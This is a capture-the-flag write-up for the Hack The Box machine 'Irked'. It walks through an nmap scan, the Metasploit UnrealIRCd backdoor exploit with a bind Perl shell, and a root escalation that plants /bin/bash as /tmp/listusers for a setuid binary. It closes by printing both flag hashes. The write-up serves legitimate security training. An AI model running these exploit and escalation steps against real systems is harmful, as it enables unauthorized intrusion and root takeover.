Irked HTB Write-up

Machine IP - 10.10.10.117

Initial Phase

Starting with an nmap scan, we get the following result -

Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-03 18:16 +04 Nmap scan report for 10.10.10.117 Host is up (0.25s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0) 80/tcp open http Apache httpd 2.4.10 ((Debian)) 111/tcp open rpcbind 2-4 (RPC #100000) 6697/tcp open irc UnrealIRCd 60500/tcp open status 1 (RPC #100024) 65534/tcp open irc UnrealIRCd Service Info: Host: irked.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 18.48 seconds

We can check the IRC service. It can be searched for service enumeration, which gives us the hint that it is Unreal IRCd. This can be searched for exploits on metasploit as follows -

root@kali:~/Desktop/Hack The Box/irked# nmap -sV -p 6697 10.10.10.117 Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-17 22:31 +04 Nmap scan report for 10.10.10.117 Host is up (0.20s latency). PORT STATE SERVICE VERSION 6697/tcp open irc UnrealIRCd Service Info: Host: irked.htb Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 2.04 seconds

Moving forward

From here, we can use metasploit for the exploit as follows -

root@kali:~/Desktop/Hack The Box/irked# msfconsole -q msf5 > search unreal ircd Matching Modules ================ Name Disclosure Date Rank Check Description ---- --------------- ---- ----- ----------- exploit/linux/games/ut2004_secure 2004-06-18 good Yes Unreal Tournament 2004 "secure" Overflow (Linux) exploit/unix/irc/unreal_ircd_3281_backdoor 2010-06-12 excellent No UnrealIRCD 3.2.8.1 Backdoor Command Execution exploit/windows/games/ut2004_secure 2004-06-18 good Yes Unreal Tournament 2004 "secure" Overflow (Win32) ###### trying the excellent one msf5 > use exploit/unix/irc/unreal_ircd_3281_backdoor msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > show payloads Compatible Payloads =================== Name Disclosure Date Rank Check Description ---- --------------- ---- ----- ----------- cmd/unix/bind_perl normal No Unix Command Shell, Bind TCP (via Perl) cmd/unix/bind_perl_ipv6 normal No Unix Command Shell, Bind TCP (via perl) IPv6 cmd/unix/bind_ruby normal No Unix Command Shell, Bind TCP (via Ruby) cmd/unix/bind_ruby_ipv6 normal No Unix Command Shell, Bind TCP (via Ruby) IPv6 cmd/unix/generic normal No Unix Command, Generic Command Execution cmd/unix/reverse normal No Unix Command Shell, Double Reverse TCP (telnet) cmd/unix/reverse_bash_telnet_ssl normal No Unix Command Shell, Reverse TCP SSL (telnet) cmd/unix/reverse_perl normal No Unix Command Shell, Reverse TCP (via Perl) cmd/unix/reverse_perl_ssl normal No Unix Command Shell, Reverse TCP SSL (via perl) cmd/unix/reverse_ruby normal No Unix Command Shell, Reverse TCP (via Ruby) cmd/unix/reverse_ruby_ssl normal No Unix Command Shell, Reverse TCP SSL (via Ruby) cmd/unix/reverse_ssl_double_telnet normal No Unix Command Shell, Double Reverse TCP SSL (telnet) msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set payload cmd/unix/bind_perl payload => cmd/unix/bind_perl msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > run [*] 10.10.10.117:6697 - Connected to 10.10.10.117:6697... :irked.htb NOTICE AUTH :*** Looking up your hostname... [*] 10.10.10.117:6697 - Sending backdoor command... [*] Started bind TCP handler against 10.10.10.117:4444 [*] Command shell session 1 opened (10.10.12.66:41567 -> 10.10.10.117:4444) at 2019-03-17 22:03:24 +0400 id uid=1001(ircd) gid=1001(ircd) groups=1001(ircd) python -c 'import pty; pty.spawn("/bin/bash");' ircd@irked:~/Unreal3.2$ whoami whoami ircd

This gives us the reverse shell from the vulnerable irc chat. Now to do a privilege escalation, we can do a search for the setuid binaries available to the ircd user. sudo -l seems to be a good starting point, but unfortunately returns nothing, in fact sudo isn't executable by the user. So, find command can be used instead as follows -

ircd@irked:~/Unreal3.2$ sudo -l sudo -l bash: sudo: command not found ircd@irked:~/Unreal3.2$ find / -perm 4755 2>/dev/null find / -perm 4755 2>/dev/null /usr/lib/eject/dmcrypt-get-device /usr/lib/policykit-1/polkit-agent-helper-1 /usr/lib/openssh/ssh-keysign /usr/lib/spice-gtk/spice-client-glib-usb-acl-helper /usr/sbin/exim4 /usr/bin/chsh /usr/bin/gpasswd /usr/bin/newgrp /usr/bin/pkexec /usr/bin/passwd /usr/bin/chfn /usr/bin/viewuser /sbin/mount.nfs /bin/su /bin/mount /bin/fusermount /bin/ntfs-3g /bin/umount

The viewuser command seems to be the only odd one out i.e., all others seem to be a command that is generally present in a unix system. Therefore, we try running the command -

ircd@irked:~/Unreal3.2$ viewuser viewuser This application is being devleoped to set and test user permissions It is still being actively developed (unknown) :0 2019-03-25 01:42 (:0) sh: 1: /tmp/listusers: not found

The last line above is an error of bash where it is not able to find a binary /tmp/listusers to execute. Since the command viewuser is a setuid, maybe if it executes /bin/bash it can give a root shell. Therefore, we can try to create a file at the desired location, which is definitely in permissible bounds as tmp is writeable by all users.

ircd@irked:~/Unreal3.2$ echo "/bin/bash" > /tmp/listusers echo "/bin/bash" > /tmp/listusers ircd@irked:~/Unreal3.2$ chmod 777 /tmp/listusers chmod 777 /tmp/listusers ircd@irked:~/Unreal3.2$ viewuser viewuser This application is being devleoped to set and test user permissions It is still being actively developed (unknown) :0 2019-03-25 01:42 (:0) root@irked:~/Unreal3.2# cd .. cd .. root@irked:~# ls ls Unreal3.2 root@irked:~# cd .. cd .. root@irked:/home# ls ls djmardov ircd root@irked:/home# cd djmardov cd djmardov root@irked:/home/djmardov# ls ls Desktop Documents Downloads Music Pictures Public Templates Videos root@irked:/home/djmardov# cd Desktop cd Desktop root@irked:/home/djmardov/Desktop# ls ls root@irked:/home/djmardov/Desktop# cd ../.. cd ../.. root@irked:/home# cd /root cd /root root@irked:/root# cat root.txt cat root.txt 8d8e9e8be64654b6dccc3bff4522daf3 root@irked:/root# cd / cd / root@irked:/# find / -name user.txt 2>/dev/null find / -name user.txt 2>/dev/null /home/djmardov/Documents/user.txt root@irked:/# cat /home/djmardov/Documents/user.txt cat /home/djmardov/Documents/user.txt 4a66a78b12dc0e661a59d3f5c0267a8e

Thus, we get root and can read both the flags.